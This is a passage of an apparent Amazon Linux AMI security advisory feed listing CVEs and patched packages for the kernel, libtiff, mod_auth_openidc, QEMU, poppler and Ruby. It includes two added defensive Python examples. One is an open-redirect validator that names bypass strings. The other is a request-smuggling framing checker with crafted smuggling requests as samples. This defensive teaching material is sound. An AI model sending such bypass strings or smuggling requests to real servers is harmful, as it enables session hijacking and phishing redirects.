A flaw was found in the Linux kernel. A local attacker, able to inject conntrack netlink configuration, could overflow a local buffer causing crashes or triggering the use of incorrect protocol numbers in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-24490:
A heap buffer overflow flaw was found in the way the Linux kernel's Bluetooth implementation processed extended advertising report events. This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or to potentially execute arbitrary code on the system by sending a specially crafted Bluetooth packet. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-14386:
A flaw was found in the Linux kernel's AF_PACKET socket implementation (net/packet/af_packet.c). A local, unprivileged process that can open an AF_PACKET socket, for example through CAP_NET_RAW obtained in an unprivileged user namespace, can corrupt kernel memory and use this to gain root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-12352:
An information leak flaw was found in the way Linux kernel's Bluetooth stack implementation handled initialization of stack memory when handling certain AMP (Alternate MAC-PHY Manager Protocol) packets. This flaw allows a remote attacker in an adjacent range to leak small portions of stack memory on the system by sending specially crafted AMP packets. The highest threat from this vulnerability is to data confidentiality.
CVE-2020-12351:
A flaw was found in the way the Linux kernel's Bluetooth implementation handled L2CAP (Logical Link Control and Adaptation Protocol) packets with A2MP (Alternate MAC-PHY Manager Protocol) CID (Channel Identifier). This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or potentially executing arbitrary code on the system by sending a specially crafted L2CAP packet. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-0423:
A use-after-free flaw was found in the binder_release_work function of binder.c due to improper locking. This flaw can lead to local escalation of privileges in the kernel; no additional execution privileges and no user interaction are needed for exploitation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0423" title="" id="CVE-2020-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12351" title="" id="CVE-2020-12351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12352" title="" id="CVE-2020-12352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14386" title="" id="CVE-2020-14386" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24490" title="" id="CVE-2020-24490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25211" title="" id="CVE-2020-25211" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.203" release="116.332.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.203-116.332.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.203-116.332.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1447</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1447: medium priority package update for libtiff</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17546:
tif_getimage.c in LibTIFF through 4.0.10, as used in GDAL through 3.0.1 and other products, has an integer overflow that potentially causes a heap-based buffer overflow via a crafted RGBA image, related to a "Negative-size-param" condition.
1765705: CVE-2019-17546 libtiff: integer overflow leading to heap-based buffer overflow in tif_getimage.c
CVE-2019-14973:
_TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c in LibTIFF through 4.0.10 mishandle integer-overflow checks because they rely on signed-overflow behaviour that the applicable C standards leave undefined, so a conforming compiler may optimize the check away. This can, for example, lead to an application crash.
1745951: CVE-2019-14973 libtiff: integer overflow in _TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14973" title="" id="CVE-2019-14973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17546" title="" id="CVE-2019-17546" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.36.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.36.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.36.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1448</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1448: medium priority package update for 
mod24_auth_openidc</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20479:
An open redirect flaw was discovered in mod_auth_openidc where it handles logout redirection. The module does not correctly validate the URL, allowing a URL with a slash and a backslash at the beginning to bypass the protection checks. A victim user may be tricked into visiting a trusted vulnerable web site, which would redirect them to another, possibly malicious, URL.
1805102: CVE-2019-20479 mod_auth_openidc: Open redirect issue exists in URLs with slash and backslash
CVE-2019-14857:
An open redirect flaw was discovered in mod_auth_openidc, where it handles logout redirection. The module does not correctly validate the URL, allowing a URL with leading slashes to bypass the protection checks. A victim user may be tricked into visiting a trusted vulnerable web site, which would redirect them to another possibly malicious URL.
1760613: CVE-2019-14857 mod_auth_openidc: Open redirect in logout url when using URLs with leading slashes
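The two entries above are the same mistake in two forms: a logout redirect target is accepted because it starts with a slash, but browsers read "//host/" as a scheme-relative URL and treat a backslash like a slash, so "/\host/" goes off-site too. The following is an added example, not code from this advisory or from mod_auth_openidc, showing the naive check both CVEs defeat next to a validator that normalises backslashes and lets the URL parser decide whether a host is present. The host names are made up for the example.

```python
# Added example (not code from the Amazon Linux advisory or from
# mod_auth_openidc): why "starts with a slash" is not a same-site check for a
# post-logout redirect, and a validator that survives both bypasses. The host
# names are made up for the example.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"trusted.example.com"}  # assumption: the site's own host(s)


def naive_is_local(url):
    """The shape of check both CVEs defeat: a leading slash is taken to mean
    'a path on this site'. Browsers read '//evil.example/' as a scheme-relative
    URL (CVE-2019-14857) and treat backslashes as slashes, so '/\\evil.example/'
    is the same thing in disguise (CVE-2019-20479)."""
    return url.startswith("/")


def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return the redirect target if it provably stays on allowed_hosts, else None.

    Normalise backslashes to slashes first, the way browsers do, then let the
    URL parser say whether an authority (host) is present rather than pattern
    matching on the first characters.
    """
    if not url or any(not c.isprintable() for c in url):
        return None  # control characters have no place in a redirect target
    normalised = url.replace("\\", "/")
    try:
        parts = urlsplit(normalised)
        host = (parts.hostname or "").lower()
    except ValueError:
        return None  # e.g. unbalanced IPv6 brackets; do not guess
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return None  # javascript:, data:, ... are never a page to send users to
    if parts.netloc:
        # Userinfo tricks such as 'trusted.example.com@evil.example' are
        # defeated here because hostname is the part after the '@'.
        return normalised if host in allowed_hosts else None
    # No authority: it must be an absolute path. Browsers collapse any run of
    # leading slashes into an authority ('///evil.example/' goes off-site),
    # which urlsplit does not report, so reject a second slash explicitly.
    if not normalised.startswith("/") or normalised.startswith("//"):
        return None
    return normalised
```

Using an allow-list of full URLs for the post-logout destination, as most OpenID Connect deployments can, removes the need to validate user-supplied targets at all; the validator above is for the cases where the target must remain a parameter.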
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14857" title="" id="CVE-2019-14857" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20479" title="" id="CVE-2019-20479" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_openidc" version="1.8.8" release="7.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-1.8.8-7.6.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="7.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-7.6.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="7.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-7.6.amzn1.i686.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="7.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-1.8.8-7.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1449</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1449: important priority package update for qemu-kvm</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1983:
A use-after-free flaw was found in the SLiRP networking implementation of the QEMU emulator. Specifically, this flaw occurs in the ip_reass() routine while reassembling incoming IP fragments whose combined size is bigger than 65k. This flaw allows an attacker to crash the QEMU process on the host, resulting in a denial of service.
A use after free vulnerability in ip_reass() in ip_input.c of libslirp 4.2.0 and prior releases allows crafted packets to cause a denial of service.
1829825: CVE-2020-1983 QEMU: slirp: use-after-free in ip_reass() function in ip_input.c
CVE-2020-14364:
An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.
1869201: CVE-2020-14364 QEMU: usb: out-of-bounds r/w access issue while processing usb packets
CVE-2019-14378:
ip_reass in ip_input.c in libslirp 4.0.0 has a heap-based buffer overflow via a large packet because it mishandles a case involving the first fragment.
A heap buffer overflow issue was found in the SLiRP networking implementation of the QEMU emulator. This flaw occurs in the ip_reass() routine while reassembling incoming packets if the first fragment is bigger than the m->m_dat[] buffer. An attacker could use this flaw to crash the QEMU process on the host, resulting in a Denial of Service or potentially executing arbitrary code with privileges of the QEMU process.
1734745: CVE-2019-14378 QEMU: slirp: heap buffer overflow during packet reassembly
CVE-2018-15746:
qemu-seccomp.c in QEMU might allow local OS guest users to cause a denial of service (guest crash) by leveraging mishandling of the seccomp policy for threads other than the main thread.
1615637: CVE-2018-15746 QEMU: seccomp: blacklist is not applied to all threads
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15746" title="" id="CVE-2018-15746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14378" title="" id="CVE-2019-14378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14364" title="" id="CVE-2020-14364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1983" title="" id="CVE-2020-1983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.24.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.24.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1450</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1450: low priority package update for poppler</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14494:
A divide-by-zero error was found in the way Poppler handled certain PDF files. A remote attacker could exploit this flaw by providing a malicious PDF file that, when processed by an application linked to Poppler, would crash the application causing a denial of service.
1797453: CVE-2019-14494 poppler: divide-by-zero in function SplashOutputDev::tilingPatternFill in SplashOutputDev.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14494" title="" id="CVE-2019-14494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.22.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.22.amzn1.i686.rpm</filename></package><package 
name="poppler-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.22.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.22.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1451</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1451: medium priority package update for ruby24</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25613:
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
1883623: CVE-2020-25613 ruby: potential HTTP request smuggling in WEBrick
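Request smuggling needs two parsers that frame the same request body differently, which is why a server's Transfer-Encoding check has to be exact and not a lenient pattern match. The following is an added example, not code from this advisory or from WEBrick, showing the framing rules a server (or the proxy in front of it) should enforce: reject a request that carries both Transfer-Encoding and Content-Length, accept only the exact token "chunked", reject conflicting or malformed Content-Length values, and reject header names with whitespace before the colon. The requests are constructed samples.

```python
# Added example (not code from the Amazon Linux advisory or from WEBrick): the
# framing checks a front end and an origin server must both apply so that one
# request cannot be read as two. The requests below are constructed samples.
import re

CLEAN_CHUNKED = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)
CLEAN_LENGTH = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
    b"user=ab"
)
# Both framing headers, with a Transfer-Encoding value that a lenient
# 'contains chunked' test still accepts: the proxy may frame by Content-Length
# while the server frames by chunks (or the reverse), and the leftover bytes
# become the start of the next request on the shared connection.
BOTH_HEADERS = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: xchunked\r\n"
    b"\r\n"
    b"0\r\n\r\nG"
)
SLOPPY_TE_VALUE = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Transfer-Encoding: chunked, identity\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)
SPACE_BEFORE_COLON = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Transfer-Encoding : chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)


def parse_request_head(raw):
    """Split a raw HTTP/1.1 request into the request line and a list of
    (name, value) header pairs in wire order. Obsolete line folding, lines
    without a colon and names with trailing whitespace are rejected, since
    each is read differently by different parsers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        if line[:1] in (" ", "\t"):
            raise ValueError("obsolete line folding not allowed")
        name, colon, value = line.partition(":")
        if not colon or not name or name != name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.append((name, value.strip()))
    return request_line, headers


def framing_check(headers):
    """Decide how the body is framed: ('chunked', None), ('length', n) or
    ('none', None). Raises ValueError for anything two parsers could frame
    differently."""
    te = [v for n, v in headers if n.lower() == "transfer-encoding"]
    cl = [v for n, v in headers if n.lower() == "content-length"]
    if te and cl:
        raise ValueError("both Transfer-Encoding and Content-Length present")
    if te:
        # Transfer-coding names are case-insensitive, but only the exact token
        # is acceptable; 'xchunked' or 'chunked, identity' must not pass.
        if len(te) > 1 or te[0].strip().lower() != "chunked":
            raise ValueError("Transfer-Encoding must be exactly 'chunked'")
        return ("chunked", None)
    if cl:
        values = {v.strip() for v in cl}
        if len(values) > 1:
            raise ValueError("conflicting Content-Length values")
        value = values.pop()
        if not re.fullmatch(r"[0-9]+", value):
            raise ValueError("malformed Content-Length: %r" % value)
        return ("length", int(value))
    return ("none", None)


def classify(raw):
    """Parse a raw request and report its body framing, or why it was rejected."""
    try:
        _, headers = parse_request_head(raw)
        return framing_check(headers)
    except ValueError as exc:
        return ("rejected", str(exc))
```

The same rules belong on the reverse proxy: the advisory notes that the bypass needs a proxy with an equally poor header check, so fixing only WEBrick closes the smuggling path while fixing only the proxy does not protect other lenient back ends.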
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25613" title="" id="CVE-2020-25613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.13.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.13.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.13.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.13.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.13.amzn1.x86_64.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.13.amzn1.noarch.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.13.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.10-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.13.amzn1" epoch="0" 